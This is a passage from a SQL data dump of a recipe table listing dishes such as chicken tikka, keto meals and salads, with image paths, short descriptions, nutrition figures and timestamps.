drink','','Pakistan',1,NULL,NULL,'0','0','0','0',1,'2019-10-19 00:29:02','2019-10-05 14:35:32','2019-10-19 00:29:02',NULL,1),(9,'naan','','Pakistan',1,NULL,NULL,'0','0','0','0',1,'2019-10-18 23:55:58','2019-10-05 14:36:00','2019-10-18 23:55:58',NULL,1),(10,'test recipe','',NULL,1,NULL,NULL,'','112.08','24','0',1,'2019-10-18 23:55:51','2019-10-12 12:24:00','2021-12-22 20:36:43',NULL,1),(11,'Green Onion Egg with Brown Bread','recipes/d96a96ddbe966c14389ed022ea1043cf.jpeg','Pakistan',1,'made with eggs, bread, onions, chilies and herbs. It is one of the most popular street foods from India. It is very much eaten in all regions as a breakfast or fast food.',NULL,'4','339.9','110','0',1,NULL,'2019-10-18 22:19:49','2023-04-19 10:10:00',4,1),(12,'Vegetable Egg with Brown Bread','recipes/fe6da35b03beb5ddbc1182f272fbd2fe.jpeg','Pakistan',1,'What is better than a classic French vegetable egg with brown bread for your amazing meal? But you may worry about the calorie accompaniment of the famous breakfast recipe. Brown Bread and Egg is a wonderful eggy delight which is not only healthy but quite delicious too. The best thing about this meal is that they are high in protein.',NULL,'5','368.16','204','0',1,NULL,'2019-10-18 22:24:23','2021-12-20 21:33:43',3,1),(13,'scrambled egg with bread','/tmp/phpvOjEn8','Pakistan',1,'Word ‘ghotala’ in hindi means ‘gadbad’ or ‘confusion’ ?That’s what exactly this dish looks or sounds like – just by looking at the dish you can’t judge whether eggs are boiled, fried or scrambles ! well, its actually a mess.Boil the eggs first and then grate it!..mix with masala and pour on half cooked egg',NULL,'5','380.98','236','151',1,NULL,'2019-10-18 22:29:29','2021-12-20 21:31:18',4,1),(14,'Spinach Egg with Brown Bread','recipes/c831e6d12ec13aaad942fdddc0af6d02.jpeg','Pakistan',1,'This high quality protein dish which is also rich in vitamin K is a wonderful healthy and filling breakfast but is also best for diet lover.',NULL,'4','389.66','314','0',1,'2020-10-18 13:41:04','2019-10-18 22:30:47','2021-12-20 21:31:17',2,1),(15,'Chicken Egg Roll','recipes/fe112e2fffcc5a39f068e92ae4b4df64.jpeg','Pakistan',1,'This Crispy Chicken Egg Rolls Recipe is seriously so delicious and amazingly! The base starts with ground chicken and our specialised sauces',NULL,'','370.36','284','0',1,NULL,'2019-10-18 22:32:08','2021-12-20 21:33:43',2,1),(16,'Mix Vegi with chicken Salad Sandwich','/tmp/phpjEe2Tq','Pakistan',1,NULL,NULL,'5','353.6','155','423',1,NULL,'2019-10-18 22:38:33','2021-12-20 21:33:43',4,1),(17,'chicken Omelet Sandwich','/tmp/phpiG1Brp','Pakistan',1,NULL,NULL,'5','287.48','139','672',1,NULL,'2019-10-18 22:46:05','2022-01-31 16:03:14',4,1),(18,'Chicken Chili Dry','/tmp/php985biJ','Pakistan',1,'Chicken Chilli Dry is one of the popular Pakistani-Chinese style chicken meal that is served in Chinese restaurants across the world',NULL,'5','236.56','164','136',1,NULL,'2019-10-18 22:58:48','2021-12-20 21:33:43',4,1),(19,'Wrap with Chicken Karahi','/tmp/phpjF383j','Pakistan',1,'Chicken karahi, also known as gosht karahi and kadai chicken is a Pakistani and North Indian dish noted for its spicy taste.',NULL,'5','536.4','275','354',1,NULL,'2019-10-18 23:06:29','2021-12-20 21:31:18',4,1),(20,'Chicken Sub','/tmp/phpekFckn','American',1,NULL,NULL,'5','405.90275862069','225','632',1,NULL,'2019-10-18 23:11:59','2022-01-19 22:52:56',4,1),(21,'Chicken Chowmein','recipes/7272ddeaa2cfd78e17f996941bfd1981.jpeg','China',1,'A great Chow Mein comes down to the sauce which is made with soy sauce, oyster sauce, sesame oil, sugar and cornstarch for thickening. Slippery noodles slick with the savoury Chow Mein Sauce is noodle heaven! ... Pad Thai, Pad See Ew (Thai Stir Fried Noodles), Singapore Noodles.',NULL,'4.6666666666667','370.36142857143','246','0',1,NULL,'2019-10-18 23:19:38','2021-12-22 16:22:47',2,1),(22,'Chung thai chicken','/tmp/phpVvnfXN','China',1,NULL,NULL,'5','304.67','193','383',1,NULL,'2019-10-18 23:23:07','2021-12-20 21:33:43',4,1),(23,'Chicken Vegetable Soup','/tmp/phphikSch','China',1,NULL,NULL,'','244.99','305','0',1,NULL,'2019-10-18 23:36:14','2021-12-20 21:55:15',2,1),(24,'keto cauliflower fried Rice','recipes/f3cdb6e80b245928173063b217c29737.jpeg','China',1,NULL,NULL,'','322.65','327','0',1,NULL,'2019-10-18 23:40:21','2021-12-20 21:33:43',4,1),(25,'Rice Omelet','recipes/633eb2814a5ad9434ab0eb1f3036569d.jpeg','Pakistan',1,'It is a popular Japanese dish.  you can find this in any Japanese restaurant, This dish is pretty well-known and popular in Asian countries outside of Japan as well.',NULL,'3','310.75','200','0',1,NULL,'2019-10-18 23:42:16','2021-12-20 21:33:43',4,1),(26,'Ovocado and Broad Bean Sandwich','','United States',1,NULL,NULL,'','170.1','153','0',1,NULL,'2019-10-18 23:53:49','2021-12-20 21:16:13',NULL,1),(27,'Egg salad Sandwich','','Pakistan',1,NULL,NULL,'','507.36','234','0',1,NULL,'2019-10-18 23:56:28','2021-12-20 21:16:13',NULL,4),(28,'avocado egg sandwich','','Pakistan',1,NULL,NULL,'','176.42','111','0',1,NULL,'2019-10-19 00:00:26','2021-12-20 21:31:16',NULL,1),(29,'tikka egg with bread','/tmp/phpznZODe','Pakistan',1,NULL,NULL,'4.6666666666667','275.26','138','380',1,NULL,'2019-10-19 00:02:21','2021-12-20 21:31:18',4,1),(30,'mushroom egg with bread','recipes/aa6825a28b37b00c351e1a50f0d77ac7.jpeg','Pakistan',1,NULL,NULL,'3','161.75','85','0',1,NULL,'2019-10-19 00:04:10','2022-09-25 00:42:33',4,1),(31,'chicken with rice','/tmp/phpYNVMy4','China',1,'chicken rice is a dish of poached chicken and brown rice, served with chilli sauce and usually with cabbage and capsicum. It was created by immigrants from Hainan in southern China.',NULL,'4','312.53','233','171',1,NULL,'2019-10-19 00:08:06','2021-12-20 21:33:43',2,1),(32,'beans curry with peas rice','/tmp/php36hMzK','Pakistan',1,NULL,NULL,'','273.46','219','144',1,NULL,'2019-10-19 00:13:11','2021-12-20 21:31:16',1,1),(33,'jalfrezi chicken','recipes/447951efaa5d7ab814b523b146b7bb6b.jpeg','China',1,'This hot and spicy dish will really tantalise your taste buds. Vibrant red color with sesame seeds on top are eye catching. It is family’s TOP Hot Favorite. Serve this Dragon Chicken with Fried Rice. I am sure you will love it',NULL,'5','276.64','159','0',1,NULL,'2019-10-19 00:17:46','2022-05-22 00:04:49',4,1),(34,'Chicken Tariyaki with Garlic Rice','recipes/914e84e581821532f3938ec5f81f7575.jpeg','China',1,NULL,NULL,'','309.19333333333','233','0',1,NULL,'2019-10-19 00:21:50','2021-12-20 21:33:43',2,1),(35,'Broccoli Fried rice','','Pakistan',1,NULL,NULL,'','54.26','80','0',1,NULL,'2019-10-19 00:24:12','2021-12-20 20:59:51',NULL,1),(36,'Chicken polao','','Pakistan',1,'A world-renowned Indian dish, it is worth every bit of the effort. we cooked Biryani over a low flame',NULL,'5','359.2','215','0',1,NULL,'2019-10-19 00:26:34','2021-12-20 21:31:18',4,1),(37,'sesame fried chicken rice','',NULL,1,NULL,NULL,'','289.48','321','0',1,NULL,'2019-10-19 00:28:26','2021-12-20 21:31:17',NULL,1),(38,'Beef Chili Dry','recipes/7764e7531ff9dd346f7f5ffeb1ee1339.jpeg','China',1,NULL,NULL,'1','400.63','208','0',1,NULL,'2019-10-19 00:31:10','2021-12-20 21:33:43',4,1),(39,'Chicken Chipotli','/tmp/phpauHEV5','China',1,NULL,NULL,'5','272.54','182','184',1,NULL,'2019-10-19 00:33:14','2021-12-20 21:33:43',2,1),(40,'Red Sauce Pasta','/tmp/phpQsZDkE','Pakistan',1,NULL,NULL,'4.6666666666667','376.15142857143','217','347',1,NULL,'2019-10-19 00:35:51','2021-12-22 12:53:44',4,4),(41,'Mince Beef','/tmp/phpdb8EfV','Pakistan',1,'Mince beaf originate from USA it is a mixture of chopped beef with different sauces. Originally, mincemeat always contained meat.',NULL,'','497.84','232','152',1,NULL,'2019-10-19 00:38:13','2021-12-20 21:31:18',4,1),(42,'Chickent Boti with Chatni','/tmp/php1A2jaA','Pakistan',1,NULL,NULL,'5','365.36','204','351',1,NULL,'2019-10-19 00:39:12','2021-12-20 21:31:17',2,1),(43,'chicken Burrito','/tmp/phpdlz8Bi','Pakistan',1,NULL,NULL,'4','462.31666666667','254','122',1,NULL,'2019-10-19 00:40:44','2021-12-22 16:27:19',4,1),(44,'Chicken TIKKA','/tmp/phpyZPWwN','Pakistan',1,'Chicken tikka is a chicken dish originating in the Indian subcontinent; the dish is popular in India, Bangladesh and Pakistan',NULL,'3.5','447.86','254','331',1,NULL,'2019-10-19 00:41:30','2022-08-29 23:05:13',4,1),(45,'Spicy Salmon Fish','','Pakistan',1,NULL,NULL,'','454.16','224','0',1,NULL,'2019-10-19 00:54:34','2021-12-20 21:31:17',4,1),(46,'green chatni','/tmp/phpuP8qW3','Pakistan',1,NULL,NULL,'3.5','9','15','165',1,NULL,'2019-11-13 19:42:15','2021-01-27 22:46:32',2,1),(47,'green salad','/tmp/phpG187hi','Pakistan',1,NULL,NULL,'','160.3','345','668',1,NULL,'2019-11-13 20:13:50','2022-01-31 16:01:53',4,3),(48,'hoisin steak supreme','/tmp/phpztzUWC',NULL,1,'The hoisin sauce, fermented soy-sauce-like substance, flavoured with chilies, garlic, vinegar, sugar, and of course, exotic spices. It makes a great marinade. This steak is juicy and delicious',NULL,'5','394.87','200','323',1,NULL,'2019-11-14 14:58:21','2021-12-20 21:31:19',4,1),(49,'beef broccoli fried rice','','China',1,NULL,NULL,'','449.69','275','0',1,NULL,'2019-11-14 15:35:44','2021-12-20 21:31:17',4,1),(50,'chicken and egg salad wrap','/tmp/phpuMnWWk',NULL,1,NULL,NULL,'5','343.75','225','0',1,NULL,'2019-11-14 16:46:13','2021-12-20 21:33:43',4,1),(51,'pizza burger','/tmp/phpha1yvH','Italy',1,NULL,NULL,'5','525.91952380953','252','130',1,NULL,'2019-11-14 16:53:40','2021-12-22 20:39:50',4,1),(52,'fruit custard','',NULL,1,NULL,NULL,'','261.29','186','0',1,NULL,'2019-11-14 17:19:18','2021-12-20 21:47:30',4,1),(53,'mash potato','recipes/30d77af946282dc73530d402e3bbfb71.jpeg',NULL,1,'Mashed potato is a dish prepared by mashing boiled, peeled or unpeeled potatoes. Milk, butter, salt and pepper are frequently used in preparation and it is sometimes whipped at the end. The dish is usually a side dish to meat or vegetables',NULL,'3','55','50','0',1,NULL,'2019-11-14 17:25:26','2021-01-27 19:06:49',2,1),(54,'tuna and veggie wrap','',NULL,1,NULL,NULL,'','212.41842105263','181','0',1,NULL,'2019-11-14 18:09:03','2021-01-27 19:06:49',4,1),(55,'spinach wrap','',NULL,1,NULL,NULL,'','189.02842105263','225','0',1,NULL,'2019-11-14 18:11:17','2021-12-22 20:43:44',4,1),(56,'ground chicken lettuce wrap','',NULL,1,NULL,NULL,'','302.26842105263','214','0',1,NULL,'2019-11-14 18:18:03','2021-12-22 20:39:50',3,1),(57,'garlic and pepper wrap','/tmp/phpXZNGrh',NULL,1,NULL,NULL,'5','357.95','189','0',1,NULL,'2019-11-15 12:01:09','2022-08-29 23:13:56',5,1),(58,'vegetable salad wrap','recipes/defcb1875b0465c9b29f4c73e264781b.jpeg',NULL,1,'A delicious and healthy recipe .. these Indian Veg Salad Wrap will be surely loved by everyone. Its so colourful, super tasty and kind of grab to go food. A very good and filling dish great for weight loss',NULL,'','121.86842105263','149','0',1,NULL,'2019-11-15 12:29:37','2021-12-20 21:33:43',4,1),(59,'chowmein wrap','recipes/aff163d0e554a34aaf7a02d2a649eb39.jpeg',NULL,1,NULL,NULL,'','263.33413533835','203','0',1,NULL,'2019-11-15 14:10:26','2021-12-22 16:22:47',3,1),(60,'omelette with rice','',NULL,1,NULL,NULL,'','203.54','132','0',1,NULL,'2019-11-16 20:23:44','2021-12-20 21:31:17',4,1),(61,'chicken rice salad','/tmp/phpcDDGOX',NULL,1,NULL,NULL,'5','202.05','215','0',1,NULL,'2019-11-16 20:29:49','2021-12-20 20:44:43',4,1),(62,'carrot and hummus sandwich','recipes/6148311f8a382ab091f192426476677e.jpeg',NULL,1,NULL,NULL,'','318.1','190','0',1,NULL,'2019-11-16 20:38:02','2021-12-20 21:16:13',2,1),(63,'ground chicken egg sandwich','/tmp/phpYANfxm',NULL,1,'Ground chicken egg sandwich tend to often be dry, right? Well, you’ve never tasted such juicy chicken sandwich in your life!',NULL,'3.3333333333333','352.11','174','336',1,NULL,'2019-11-16 20:40:51','2021-12-20 21:31:17',2,1),(64,'chicken burger','/tmp/phpMe9jkR',NULL,1,NULL,NULL,'5','457.78857142857','214','329',1,NULL,'2019-11-16 20:47:11','2021-12-20 21:33:43',4,4),(65,'hummus','recipes/ba3880fdf4e6d0dca89aced5e0daf68b.jpeg',NULL,1,'Hummus is a dip or spread made from cooked, mashed chickpeas blended with tahini, lemon juice, and garlic. It is popular in the Middle East and Mediterranean, as well as in Middle Eastern cuisine around the globe',NULL,'5','112.92','42','0',1,NULL,'2019-11-16 20:51:00','2021-12-22 15:35:36',2,1),(66,'Masala rice','/tmp/phpgmw7hn','Pakistan',1,NULL,NULL,'','394.85','273','177',1,NULL,'2019-11-17 22:12:14','2022-04-15 08:49:16',4,1),(67,'chicken salad','/tmp/php250Itv',NULL,1,NULL,NULL,'','284.72','251','582',1,NULL,'2019-11-21 18:22:46','2022-01-19 11:58:15',2,4),(68,'carrot chicken salad','',NULL,1,NULL,NULL,'','267.34','233','0',1,NULL,'2019-11-21 18:34:27','2021-12-20 21:31:17',4,1),(69,'strawberry spinach salad','',NULL,1,NULL,NULL,'','249.6','244','0',1,NULL,'2019-11-21 19:12:44','2021-12-22 20:42:40',4,1),(70,'vegetable rice salad','',NULL,1,NULL,NULL,'','144.85','223','0',1,NULL,'2019-11-21 19:24:27','2021-12-22 20:42:40',4,1),(71,'corn cucumber salad','/tmp/phpKpje20',NULL,1,NULL,NULL,'0.33333333333333','91.55','170','0',1,NULL,'2019-11-21 19:36:05','2023-03-14 22:13:08',4,1),(72,'grill fish','',NULL,1,NULL,NULL,'','408.5','205','0',1,NULL,'2019-11-21 21:48:52','2021-12-20 21:31:17',4,1),(73,'omelette with bread','/tmp/phpgtbipq',NULL,1,NULL,NULL,'','64.54','49','140',1,NULL,'2019-12-03 08:31:09','2021-12-20 21:31:17',2,1),(74,'chicken Omlet Sandwich','',NULL,1,NULL,NULL,'','498.76','284','0',1,NULL,'2019-12-24 12:13:58','2021-12-20 21:31:17',4,1),(75,'omlet with bread','/tmp/php9Lq9A3',NULL,1,NULL,NULL,'','275.26','154','131',1,NULL,'2019-12-24 12:24:38','2021-12-20 21:31:17',4,1),(76,'egg with bread','recipes/4801597f2c3f0aff9d3226fefac0d4c3.jpg',NULL,1,NULL,NULL,'','355.16','164','0',1,NULL,'2019-12-27 13:26:46','2021-12-20 21:31:17',2,1),(77,'egg vegetable sup','','China',1,NULL,NULL,'2','168.55','133','0',1,NULL,'2019-12-30 08:04:21','2021-12-20 21:33:43',4,1),(78,'cucumber and carrot sticks','/tmp/phplhfjXt',NULL,1,NULL,NULL,'','56','200','391',1,NULL,'2019-12-30 08:29:28','2021-12-22 15:35:57',4,3),(79,'Oats Choco cookies','/tmp/phprLGO6H',NULL,1,NULL,NULL,'1','172.12','119','552',1,NULL,'2019-12-30 09:29:24','2022-01-17 10:57:13',2,1),(80,'chicken corn sup','',NULL,1,NULL,NULL,'','161','98','0',1,NULL,'2019-12-30 09:34:48','2021-12-20 20:59:51',4,1),(81,'boiled egg','',NULL,1,NULL,NULL,'','144','100','0',1,NULL,'2019-12-30 09:40:42','2021-12-20 20:59:51',4,1),(82,'egg fried rice','/tmp/phpExLoKp',NULL,1,NULL,NULL,'3','111.86','79','147',1,NULL,'2020-01-08 10:17:22','2021-12-20 21:33:43',4,1),(83,'chicken khaowsuey','recipes/a7f258ef8e354498fb43364ecb2e864b.jpeg','India',1,NULL,NULL,'','474.89142857143','251','0',1,NULL,'2020-01-13 09:31:53','2021-12-22 16:22:47',4,1),(84,'russian salad','/tmp/phpwIIsTz',NULL,1,NULL,NULL,'0','201.7','260','620',1,NULL,'2020-01-13 10:01:49','2022-10-10 19:50:52',2,4),(85,'white manchurian','/tmp/phpXs3ALQ',NULL,1,NULL,NULL,'','294.26','178','146',1,NULL,'2020-01-13 11:34:42','2021-12-20 21:33:43',1,1),(86,'pizza','/tmp/phpv8tmnF','Italy',1,NULL,NULL,'','360.59928571429','178','0',1,NULL,'2020-01-13 11:37:54','2022-03-27 00:15:28',4,1),(87,'club sandwich','/tmp/php5WLniG',NULL,1,NULL,NULL,'5','509.2','265','598',1,NULL,'2020-01-13 12:16:02','2022-01-19 14:27:29',2,4),(88,'choco smoothie','recipes/368b9520a91453383ec2b4c54528a206.jpeg',NULL,1,NULL,NULL,'','172.31','185','0',1,NULL,'2020-01-13 12:32:04','2021-04-17 09:31:30',4,1),(89,'Skimmed coffee','/tmp/phpgMwWwI','American',1,NULL,NULL,'3.4','5.1','22','611',1,NULL,'2020-01-13 12:51:17','2022-01-19 15:27:07',4,1),(90,'pina colada','recipes/22e8d1d1f9418f109405b64d1595cd1e.jpeg',NULL,1,NULL,NULL,'','373.27058823529','165','0',1,NULL,'2020-01-21 01:19:08','2021-01-27 19:06:50',2,1),(91,'chickpeas salad','/tmp/phpIYW3k7',NULL,1,NULL,NULL,'4.5','400.6','200','135',1,NULL,'2020-01-21 02:36:17','2021-01-27 22:46:32',4,1),(92,'singhaporian rice','/tmp/phpqXJjZe','Singapore',1,NULL,NULL,'','492.44571428571','313','64',1,NULL,'2020-02-19 02:11:20','2022-05-21 23:56:23',4,1),(93,'brownies','/tmp/phpU3bW5w',NULL,1,NULL,NULL,'','304','140','0',1,'2020-07-15 17:11:41','2020-02-19 03:12:37','2021-12-20 20:59:52',2,1),(94,'pancake','/tmp/phpTbdeMh',NULL,1,NULL,NULL,'5','375.58','202','128',1,NULL,'2020-02-20 01:16:05','2021-12-20 21:47:30',4,1),(95,'cutlets','/tmp/phpVNoPbi',NULL,1,NULL,NULL,'','392','280','174',1,NULL,'2020-02-20 02:17:50','2021-12-20 21:55:15',4,1),(96,'cup cake','/tmp/phpt9PsCn',NULL,1,NULL,NULL,'','425.06','134','175',1,NULL,'2020-02-24 07:05:08','2021-12-28 11:19:51',4,1),(97,'banana baked oatmeal','/tmp/phpnNvQb6',NULL,1,NULL,NULL,'5','209.88','172','0',1,NULL,'2020-02-24 07:33:43','2021-12-20 21:47:30',4,3),(98,'b.1','',NULL,1,NULL,NULL,'','127.92','64','0',1,NULL,'2020-02-24 09:36:44','2021-12-22 16:10:24',4,1),(99,'egg roll with hummus','/tmp/phpO67NBY',NULL,1,NULL,NULL,'5','305.55','210','541',1,NULL,'2020-02-27 10:48:20','2022-01-17 10:48:01',4,1),(100,'moroccan steak','/tmp/phpD7IfhR',NULL,1,NULL,NULL,'5','337.35','235','213',1,NULL,'2020-03-04 01:37:52','2021-12-20 21:33:44',2,1),(101,'vegetable cutlet','',NULL,1,NULL,NULL,'0','271.15','295','0',1,NULL,'2020-03-06 00:53:16','2021-12-20 21:55:15',4,1),(102,'mint margrita','/tmp/phpKRI9NE',NULL,1,NULL,NULL,'','66.9','39','0',1,NULL,'2020-03-08 09:48:47','2021-01-27 19:06:51',2,1),(103,'bake roll','/tmp/phpWDMhwq',NULL,1,NULL,NULL,'','263.39','178','0',1,NULL,'2020-03-08 13:34:54','2022-10-01 22:22:03',2,3),(104,'red beans salad','/tmp/phpN6tbZe',NULL,1,NULL,NULL,'','134.55','185','0',1,NULL,'2020-03-08 13:51:37','2021-12-28 12:11:43',4,1),(105,'vegetable samosa','/tmp/phpmSoBpa',NULL,1,NULL,NULL,'','559.26428571429','310','0',1,NULL,'2020-03-17 01:35:02','2021-12-20 21:33:43',2,1),(106,'chicken hotdog','',NULL,1,NULL,NULL,'4','388.99174603175','185','0',1,NULL,'2020-03-21 23:42:02','2021-12-20 21:31:17',4,1),(107,'dynamite chicken','/tmp/phpzNwMyS',NULL,1,NULL,NULL,'','475.73333333333','230','0',1,NULL,'2020-04-29 00:32:44','2021-12-20 21:31:17',4,1),(108,'omelette','',NULL,1,NULL,NULL,'','195.26','84','0',1,NULL,'2020-05-07 11:18:03','2021-12-20 21:31:17',4,1),(109,'oats and chicken sandwich','',NULL,1,NULL,NULL,'4','364.36','169','0',1,NULL,'2020-05-07 19:57:25','2021-12-20 21:31:17',4,1),(110,'Lentils kavab','/tmp/phpLV0orB',NULL,1,NULL,NULL,'','434.71285714286','272','0',1,NULL,'2020-05-10 12:24:50','2021-12-20 21:33:44',5,1),(111,'white kidney beans wrap','',NULL,1,NULL,NULL,'','217.45','148','0',1,'2020-07-15 17:11:04','2020-05-10 13:04:39','2021-12-20 21:31:17',4,1),(112,'keto bacon egg roll','',NULL,1,NULL,NULL,'','355.9','140','0',1,NULL,'2020-05-12 18:40:10','2021-12-28 11:19:52',4,2),(113,'keto chicken cubes','/tmp/phpMwfqfO',NULL,1,NULL,NULL,'','546','235','358',1,NULL,'2020-05-12 19:03:18','2021-12-22 20:39:50',4,1),(114,'keto egg bell peppers','/tmp/phpYGQfJz',NULL,1,NULL,NULL,'','298.1','160','0',1,NULL,'2020-05-14 11:52:38','2021-12-22 20:39:50',2,2),(115,'KETO LEMON PEPPER THAI STEAK','/tmp/phpOwW35u',NULL,1,NULL,NULL,'','437.25','215','0',1,NULL,'2020-05-14 13:25:42','2021-12-22 20:39:50',2,2),(116,'keto chicken farcha','/tmp/phps7bWu0',NULL,1,NULL,NULL,'','468.3','205','325',1,NULL,'2020-05-15 11:35:24','2021-12-20 21:31:18',2,2),(117,'choco brownie','/tmp/phpIE2rLd',NULL,1,NULL,NULL,'','263.60588235294','115','0',1,NULL,'2020-05-15 12:03:07','2021-12-28 11:19:52',2,2),(118,'keto chicken achari handi','',NULL,1,NULL,NULL,'','480.8','260','0',1,NULL,'2020-05-15 12:34:26','2021-12-20 21:31:18',4,2),(119,'keto basil chicken','/tmp/phpsPVEyq',NULL,1,NULL,NULL,'','373.72','213','364',1,NULL,'2020-05-15 13:18:18','2021-12-20 21:31:18',4,1),(120,'Keto Lasagna','/tmp/phpFn6NWI',NULL,1,NULL,NULL,'','481.6','210','0',1,NULL,'2020-05-16 11:35:35','2021-12-22 20:39:50',2,2),(121,'keto Cheese Egg','/tmp/phpDvajuk',NULL,1,NULL,NULL,'','276.2','125','664',1,NULL,'2020-05-16 11:43:20','2022-08-30 01:19:26',2,2),(122,'keto chicken omlet','/tmp/phpfyNP6P',NULL,1,NULL,NULL,'','366.9','210','0',1,NULL,'2020-05-16 12:06:35','2021-12-28 11:19:51',2,2),(123,'keto chicken chapii kabab','/tmp/phppwgmYh',NULL,1,NULL,NULL,'','420.7','167','0',1,NULL,'2020-05-16 12:12:15','2022-04-08 08:07:50',2,2),(124,'keto chicken tikka','/tmp/phpYPynrc',NULL,1,NULL,NULL,'','429.5','190','0',1,NULL,'2020-05-16 12:16:15','2021-12-22 20:36:43',2,2),(125,'keto Chicken nuggets','/tmp/phpAQZkef',NULL,1,NULL,NULL,'','365.55','170','0',1,NULL,'2020-05-17 11:59:15','2021-12-22 20:36:43',2,2),(126,'keto chicken chilli dry','/tmp/phpM8J8jn',NULL,1,NULL,NULL,'','392.42','261','356',1,NULL,'2020-05-17 12:05:55','2021-12-20 21:33:43',4,2),(127,'keto Creamy mustard thigh chicken','/tmp/php41fUiU',NULL,1,NULL,NULL,'','398.9','190','349',1,NULL,'2020-05-17 12:19:53','2021-12-22 20:39:50',2,2),(128,'keto salt and pepper cheese seekh botti','/tmp/phpaKHPR3',NULL,1,NULL,NULL,'','502.4','240','0',1,NULL,'2020-05-17 12:31:36','2021-12-22 20:36:44',2,2),(129,'keto scrambled egg','/tmp/phpVrXrJV',NULL,1,NULL,NULL,'','231.32222222222','156','0',1,NULL,'2020-05-17 12:35:47','2021-12-28 11:19:51',1,2),(130,'keto Chicken minced egg roll','/tmp/phpCRzd0s',NULL,1,NULL,NULL,'','327.05','170','0',1,NULL,'2020-05-17 12:52:50','2021-12-22 20:39:50',2,2),(131,'keto egg vegetable salad','',NULL,1,NULL,NULL,'','225.3','230','0',1,NULL,'2020-05-18 13:04:52','2021-12-22 20:41:18',4,1),(132,'keto crispy fried chicken steak with creamy dynamite sauce','/tmp/phpUO5r8m',NULL,1,NULL,NULL,'1','342.8','190','0',1,NULL,'2020-05-19 12:05:06','2021-12-22 20:39:50',2,2),(133,'carrot and zucchini noodles','',NULL,1,NULL,NULL,'2.5','323.36','294','0',1,NULL,'2020-05-24 20:05:18','2021-12-20 21:33:43',4,1),(134,'keto Butter Chicken','/tmp/phpYjPkl4',NULL,1,NULL,NULL,'1','414.6','190','653',1,NULL,'2020-05-28 13:33:22','2022-01-27 15:26:32',2,2),(135,'Keto Chicken Alfredo','',NULL,1,NULL,NULL,'','293.25','165','0',1,NULL,'2020-05-28 13:48:19','2021-12-28 11:19:52',4,2),(136,'Keto Chicken Alfredo','',NULL,1,NULL,NULL,'','428.07','227','0',1,NULL,'2020-05-28 13:48:25','2021-12-28 11:19:51',4,1),(137,'keto egg sandwich','',NULL,1,NULL,NULL,'','287.9','180','0',1,NULL,'2020-05-29 18:22:20','2022-03-31 00:53:24',4,2),(138,'keto mughlia chicken handi','',NULL,1,NULL,NULL,'','463.48235294118','240','0',1,NULL,'2020-05-29 18:56:01','2022-03-31 00:51:57',4,2),(139,'keto chicken burger','/tmp/phpChNXoD',NULL,1,NULL,NULL,'','456.06470588235','175','361',1,NULL,'2020-06-07 19:59:50','2021-12-22 21:19:11',2,2),(140,'Bell Pepper Omelet','',NULL,1,NULL,NULL,'','289.89','258','0',1,NULL,'2020-06-15 17:53:15','2022-08-30 03:02:36',4,1),(141,'Keto Beef Stroganoff','',NULL,1,NULL,NULL,'','696.8','410','0',1,'2020-08-23 06:08:45','2020-06-15 19:01:45','2021-12-28 11:19:51',4,1),(142,'cumin cookies','',NULL,1,NULL,NULL,'','158.46','51','0',1,NULL,'2020-06-15 19:26:00','2021-12-28 11:19:51',4,1),(143,'chicken white pulao','/tmp/phpSyjObx',NULL,1,NULL,NULL,'','240.49','176','395',1,NULL,'2020-06-16 01:41:01','2021-12-20 21:31:18',4,1),(144,'Keto Coconut cookies','',NULL,1,NULL,NULL,'','338.37352941176','100','0',1,NULL,'2020-06-17 19:32:36','2021-12-28 11:19:51',4,2),(145,'keto egg','/tmp/phpbhgCiq',NULL,1,NULL,NULL,'','107.85','55','0',1,NULL,'2020-06-17 19:43:46','2021-12-28 11:19:52',5,2),(146,'lemon pepper steak','',NULL,1,NULL,NULL,'','305.75','215','0',1,NULL,'2020-06-18 00:47:48','2021-12-20 21:33:43',4,1),(147,'bulletproof coffee','/tmp/phpYIAYHt',NULL,1,NULL,NULL,'','75.05','28','337',1,NULL,'2020-07-15 17:13:35','2021-12-28 11:19:51',5,2),(148,'Keto stuffed Zucchini','/tmp/phpFdBuol',NULL,1,NULL,NULL,'','292.95','250','385',1,NULL,'2020-08-23 06:13:47','2022-08-30 01:35:10',4,2),(149,'keto tandori biryani','',NULL,1,NULL,NULL,'','500.36','439','0',1,NULL,'2020-08-23 06:24:41','2021-12-20 21:31:17',4,1),(150,'keto coconut milk pudding','','Italy',1,NULL,NULL,'','404.72352941176','126','0',1,NULL,'2020-08-23 07:04:28','2022-08-30 01:33:39',4,2),(151,'egg kari with cauliflower rice','/tmp/phppi9Iip',NULL,1,NULL,NULL,'1','220.1','298','0',1,NULL,'2020-08-23 07:45:35','2021-12-20 21:31:17',5,1),(152,'grilled steak with blanched veg','/tmp/phpw3PM3d',NULL,1,NULL,NULL,'','384.4','215','645',1,NULL,'2020-08-23 07:52:54','2022-09-22 22:49:28',5,2),(153,'Keto Chocolate cupcake','/tmp/php8Oa7o6',NULL,1,NULL,NULL,'','347.91176470588','127','651',1,NULL,'2020-08-23 08:02:15','2022-01-27 15:20:08',5,2),(154,'keto chowmin','/tmp/phpbSSsST',NULL,1,NULL,NULL,'','239.05','225','393',1,NULL,'2020-09-03 13:07:07','2021-12-20 21:33:43',4,2),(155,'keto pizza','/tmp/phpuOmQN7',NULL,1,NULL,NULL,'','472.23','259','0',1,NULL,'2020-09-03 13:18:34','2021-12-28 11:19:52',5,2),(156,'protein chickpeas salad','',NULL,1,NULL,NULL,'','329.26222222222','141','0',1,NULL,'2020-09-03 14:01:59','2021-12-20 20:57:17',4,1),(157,'mix veggies egg','/tmp/phpjVnS1h',NULL,1,NULL,NULL,'','272.15','200','0',1,NULL,'2020-09-03 14:11:13','2021-12-20 21:33:44',5,1),(158,'banana pancake','',NULL,1,NULL,NULL,'','272.97','143','0',1,NULL,'2020-09-03 14:26:35','2022-08-29 00:04:05',4,1),(159,'salt and pepper noodles','',NULL,1,NULL,NULL,'','422.41428571428','230','0',1,NULL,'2020-09-03 14:36:19','2021-12-22 16:22:47',4,1),(160,'keto chicken nihari with tortilla','/tmp/php3dCtnH',NULL,1,NULL,NULL,'','624.70588235294','325','0',1,NULL,'2020-09-06 14:25:08','2021-12-22 21:19:11',5,1),(161,'chocolate banana oats pudding','',NULL,1,NULL,NULL,'','275.1','185','0',1,NULL,'2020-09-06 15:41:50','2021-12-20 21:47:30',4,1),(162,'keto Malai kofta','',NULL,1,NULL,NULL,'','432.06','192','0',1,NULL,'2020-09-06 15:53:11','2021-12-20 21:31:19',4,2),(163,'Keto Creamy fry malai tikka','',NULL,1,NULL,NULL,'','285.16','135','0',1,NULL,'2020-09-06 16:35:47','2022-08-30 01:26:31',4,2),(164,'Keto Chicken ala 